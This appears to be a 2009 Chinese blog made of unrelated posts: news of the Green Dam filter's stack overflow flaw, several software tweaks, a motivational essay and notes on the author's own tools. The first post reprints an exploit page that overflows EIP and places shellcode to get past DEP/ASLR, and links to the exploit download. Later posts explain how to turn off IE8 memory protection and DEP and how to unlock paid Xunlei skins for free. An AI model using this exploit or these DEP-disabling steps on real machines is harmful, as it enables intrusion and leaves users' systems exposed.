近日，密歇根大学研究人员发布了“绿坝-花季护航”栈溢出漏洞分析报，原因是绿坝软件使用固定长度的缓冲区来处理网址，因此如果长度超出处理范围便会出现缓存溢出，黑客可以利用它将浏览器定向到有恶意代码的网站。

　　就在“绿坝-花季护航”高危漏洞公布不久，黑客 seer[N.N.U] 在 milw0rm.com 上发布了利用该漏洞的攻击代码，可导致浏览器崩溃。

Green Dam remote buffer overflow exploit

"Green Dam" is a software used for monitoring and anti-pornography, popularizing by
Chinese goverment. After July 1st, it will be forced to install on all new Chinese PCs.
Now it already has 50 million copies in China.
In order to monitor the URL that user is exploring, Green Dam injected the browser
process. When Green Dam is trying to handle a long URL, a stack overflow will occur in the
browser process.
This exploit can be used for exploitation on IE, on those computers installed Green Dam.
I used the .net binary to deploy shellcode, for it`s more stable than Heap Spray, and able
to bypass DEP and ASLR on Vista.
The exploit page contains a .net control, so it should be published on IIS.

“绿坝-花季护航”溢出漏洞攻击代码：

<html></p> <p><head><br /> <script><br /> function x()<br /> {<br /> var url='';<br /> for(var i=1; i<=2035; i++)<br />  url += '$'; // '$' = 0x24, eip = 0x24242424, hum?;-)</p> <p>window.location=url + '.html';<br /> }<br /> </script></p> <p></head></p> <p><body></p> <p><object classID="exploit.dll#exploit.Shellcode"></object><br /> <!--Deploy shellcode in browser process at base address 0x24242xxx--></p> <p><input type="button" value="fire" onclick="x()" /><br /> </body></p> <p></html>

“绿坝-花季护航”栈溢出漏洞攻击代码下载：http://milw0rm.com/sploits/2009-green-dam.zip

临时防范方法：
1、关闭“绿坝”过滤监控功能
2、卸载“绿坝”（可利用专用卸载工具）

　　漏洞曝了，攻击代码公布了，这次“国家的4000W扶持”算是失败了。大多数网民都不接受，更重要的是“绿坝”这东西被一家叫Solid Oak Software的美国软件公司指控其盗用该公司CyberSitter软件的编码，有趣的是“绿坝”竟然通过Solid Oak的服务器更新黑名单~~~不知道7月1日正式预装那天意味着什么...

去广告方法一：

最新迅雷去廣告方法

[X]:\Program Files\Thunder\Profiles\users\[UserName]\

注：

[X]代表迅雷的安装目录盘符，

[UserName]代表你的迅雷帐号昵称.

请按照实际情况修改本路径。

2. 看一下该目录下是否有“vipsettings.ini”文件，没有就新建一个。

3. 向文件里输入如下内容：

[VIP_SETTING]

THUNDER_MINISITE=0

SKIN_TYPE=1

SKIN_NAME=default

FIRST_LOGIN=0

MAIN_AD=0

NEW_TASK_PANEL_AD=0

XUNLEI_TIP=0

WELCOME_PANEL=0

VIP_CFG_SYNCHRO=0

附参数说明：

[VIP_SETTING]

THUNDER_MINISITE=0 //迅雷资讯，1是开启，0是关闭

SKIN_TYPE=1 //皮肤类型，有两类，非别是1和2，2是会员皮肤

SKIN_NAME=default //皮肤名，可以在skin和skin2目录下查看，如果不用相关的VIP本地补丁改了也是没效果的。

FIRST_LOGIN=0

MAIN_AD=0 //主界面广告，1是开启，0是关闭

NEW_TASK_PANEL_AD=0 //新建面板广告，1是开启，0是关闭

XUNLEI_TIP=0 //影视快讯，1是开启，0是关闭

WELCOME_PANEL=0 //欢迎界面，好像是会员有效的。

VIP_CFG_SYNCHRO=0

去广告方法二：

最新的迅雷加入了与QQ类似的VIP会员功能, 迅雷会员还有专用皮肤. 这里有一个简单的办法可以轻松让非会员免费使用会员皮肤, 同时可以修改参数以隐藏主界面的广告条幅.

找到 [X]:\Program Files\Thunder\Program\ThunderUI.xml 打开文件, 清空顶部 GUIToolBoxItems 部分, 可以去除左侧的插件栏. 注意不要弄坏XML结构. 请谨慎, 备份后再做, 防止出问题.

所有迅雷的皮肤都存储在 [X]:\Program Files\Thunder\Skin2

打开这个文件夹, 并随便选择一款皮肤. 如"red"对应的是"火焰之息(会员)".

打开目录中的package.ini

文件类似这样:

[config]

name=red

showname=火焰之息(会员)

description=2red

author=迅雷网络

vip=1

只需要把vip=1改成vip=0就可以了. 在迅雷皮肤菜单可以立即更换, 不需重启.

打开 [X]:\Program Files\Thunder\Program\ThunderUI.xml.

找到这一行 POSITION Left="0" Top="0" width="GDET.MainFrame.Width" height="60",将height值改为0即可.

这只是隐藏了广告条, 并不能防止后台下载广告.

打开[X]:\Program Files\Thunder\Components\Streamer.

打开streamer.xml, 将里面的true改为false.

删除AD文件夹和其余两个xml文件, 将整个文件夹开启"只读"属性.

完美解决方案：
打开IE8浏览器，选择菜单“工具”->“Internet 选项”->“高级”->“(安全)启用内存保护以减少联机攻击*”，去掉前面的勾勾，并重启IE8。再进入需要安装ActiveX控件的页面(例如:支付宝、财付通、网上银行..等等..)，出现ActiveX控件提示的时候选择启用，大概尝试2～3次就一切正常了。

Data Execute Prevention (DEP) - 数据执行保护

关闭XP的DEP数据保护:
　　对C:\boot.ini文件进行修改，首先你要改变它的只读属性，右键单击该文件选择“属性”，然后取消选择“只读”。然后你可以用记事本来对它进行编辑，找到以multi(0)disk(0)开头的条目，在那一行的结尾应该是/fastdetect选项，如果你安装了SP2，就还能看到/noexecute选项，这正是DEP生效的标志。你可以将/noexecute改为/execute，然后重新启动机器。

关闭Vista的DEP数据保护:
在运行里输入 bcdedit.exe /set {current} nx AlwaysOff 回车运行就可以了。

小巷思维：
　　不是进，就是退，要么成功，要么就放弃，这就是小巷思维！
　　由于人在小巷当中，不是进，就是退，所以很容易造成压力，压力一多，就容易失控，一旦失控，就面临失败，到底是什么把人推向小巷当中呢？答案是你自己，人们总是想要用最快、最好、最省力的方法来达到目的，结果在不知不觉当中，就走入了小巷当中！
　　一辆好车，最重要的不是速度，而是刹车，做事也一样，必要的时候刹车，思考一下，停顿一下。也许事情不是像我们自己感受的那样，只要走出小巷就可以看见一片蓝天。
　　人总是想着用最快、最好、最省力的方法来达到目的，不知不觉中就把自己推到小巷当中。
　　所以我们必须随时停下来，看看自己是在小巷之中还是在一片平原当中，小巷只有进和推，而平原四面八方都是路。
　　当我们只是一味往前走，而不是进进出出找出路时，其实我们一点都没有往前走，而是在转迷宫，总也转不出出路。
　　突破小巷思维，凌空跃起，审视整件事情，退一步海阔天空。

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

　　其实在任何时候，我们都是有更多选择的，这取决于一个人的视野，实力，经验和思维方式。就好比在高尔夫球场，你有很多选择，很多路，因为你是在一个很有余地的位置上的。

　　所以永远都不要把自己放在那样一个“小巷”里，去做“前进”还是“放弃”的“生死抉择”，首先要明确的是“你想得到什么？”是金钱，名誉，还是地位？对商人来说“利益”是最重要的，明确了这点以后，再去想办法。

　　小时候看电视就知道“好人，坏人”，但其实还有很多“不好不坏”或“时好时坏”的人(看美剧之后就很深刻的体会到这一点)，世上皆事如此，除了黑，白以外，灰色地带是最大的。曾有人说过我不会使用“迂回”的方法，一是因为我真的不会，二是因为，自己觉得那是一种“手段”，利用这种“手段”去做事是很不光明正大的。

注：除了蓝色字体部分，其他均为转载。这个……很值得思考……

　　最近越来越懒得更新了，不过今天是六一儿童节，怎么说都不能放了儿童们的鸽子，哇哈哈哈。所以嘛，WarKey++ 4.0 送给又需要的朋友们。

　　好了，最近懒得写改键了。最近有新想法，新产品正在酝酿中，软件简称ADDS，具体功能待定。呼~话说7月1日就毕业了，咋办呢？咋办呢？(话说明天还要上班，早点睡吧。)

　　对了，这个月有高考，想到高考...往事不堪回首。希望高三的弟弟们能考个好成绩哈~

下面引用中国站长(CNZZ)的原话：
统计概况为您提供网站今日的流量变化趋势，以及各种重要的流量数据。
2009年5月19日由于卡巴误报CNZZ统计代码，影响CNZZ部分统计数据。

这年头卡巴常常误报，我都改用NOD32了。在这里加加对19日使用卡巴访问本站误报病毒的朋友表示抱歉...我也是今天才知道有这回事的...郁闷...

　　最近本人用上了 Win7 RC，感觉那是相当不错。Win7 标配的是 Internet Explorer 8(IE8) 新增了一个叫“加速器”的功能，当你用鼠标选择了网页上的一段文字时会自动出现一个按钮。这个功能还是不错的，就是那个图片按钮真的有点烦。

　　下面提供一个禁用该功能的方法，操作过程如下：
　　打开IE8浏览器 -> 工具 -> Internet 选项 -> 高级 - 设置(拉到最下面) - 在选择时显示加速器按钮(把这个勾给取消)

　　完成了，就这样解决了加速器这个烦人的问题，哈哈哈...


关键字：关闭IE8加速器按键、禁止IE8加速器按钮、禁用IE8加速器、关掉IE8加速器

下个版本将在六一儿童节发布，不过不会叫六一儿童版，因为在去年的儿童节已经有过这个版本名称了，哈哈哈。

WarHelper 6.8 将继续修正不额外增加新的功能，一直到最终版都保持目前功能不做大的改变。

加加魔兽助手的最终版确定在 6.9 或者 7.0 ，作为这个系列的终结。最近在win7下测试兼容性，话说回来win7挺好用的。

不过...一个系列的终结并不代表不会有其他其他作品来延续，呵呵。(也许有人已经见过了)

不过话说回来，功能太多能用上的人并不多。所以我会继续更新 WarKey++ 新增额外的扩展一对一的改键功能。

在 WarKey++ 3.3 将增加一个运行自动最小化的功能和一个保留任务栏全屏窗口化的功能，其他没有太大的改动。

然后，直接跳过3.X版本号直接出 WarKey++ 4.0 扩展6个一对一的改键功能，之后就是 4.X 的修正过程。

其他的到时候再说吧，一切都是有计划的，有兴趣的朋友可以留言发表你的意见，我都将一一的给予回复。

　　NOD32有一个很让人郁闷的问题，多次重复覆盖一个文件会导致NOD32认为这个文件是病毒，针对EXE类型的文件。很神奇...